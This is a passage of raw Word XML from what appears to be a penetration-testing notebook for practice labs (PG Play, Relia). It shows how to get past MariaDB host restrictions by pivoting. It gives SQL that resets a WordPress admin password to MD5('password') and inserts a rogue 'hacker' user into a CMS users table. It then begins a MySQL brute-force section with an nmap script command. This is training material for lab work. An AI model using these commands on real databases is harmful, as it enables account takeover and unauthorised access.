      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get an error message like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.45.232' is not allowed to connect to this MariaDB server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A05">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR 1130 (HY000): Host 'WK01' is not allowed to connect to this MariaDB server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Challenge Labs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then that means you likely have to access mysql by pivoting to that machine and then accessing it via localhost</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9tgjna1lnkl7" w:id="210"/>
      <w:bookmarkEnd w:id="210"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to reset passwords in MySQL table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId521">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had a MySQL database called wordpress_db. Inside this database was a table called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this table was the admin user, but it's MD5 hash was uncrackable, so we just reset the password to something we know</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1841500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="189" name="image183.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image183.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId522"/>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1A11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE wp_users SET user_pass = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5('password')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE wp_users.user_login = "admin";</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">update wp_users set user_pass=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5('password')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where ID=1;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can log into wordpress now with credentials admin : password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rczf9kr0gexc" w:id="211"/>
      <w:bookmarkEnd w:id="211"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add row to MySQL table (useful for adding fake users to access a website)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId523">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, while this attack vector didn't work, it was a good idea. We got a MySQL table which corresponded to a CMS website. And we wanted to get into that CMS website. So, once we got access to the MySQL table, we tried adding in our own user so that we can past the login page. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="698500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75" name="image67.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image67.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId524"/>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1A1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="520"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the table before, with just the user Admin. The MD5 password hash was unbreakable btw, just in case you were curious why they didn't get root from this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then you have to create your own MD5 hashed password and then insert a row like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insert into cms_users values(2,'hacker',</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'enter_hash'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,1,NULL,NULL,1,NULL,NULL);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="965200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="343" name="image331.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image331.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId525"/>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1A21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the table has a second user. But, the website must not have been synchronized with this table because the login page didn't accept this new user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if you were curious, the correct attack vector was to actually reset the admin password. You can see how we did it in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMSMS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sub-section within the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New Attack Methods</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A26">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2nl1ozj57w76" w:id="212"/>
      <w:bookmarkEnd w:id="212"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Forcing mysql:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For usernames, try from this list. Try "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3973575" cy="2445277"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="455" name="image445.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image445.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId526"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3973575" cy="2445277"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -p 3306 -- script mysql -* 192.168.241.118</w:t>
      </w:r>
    </w:p>
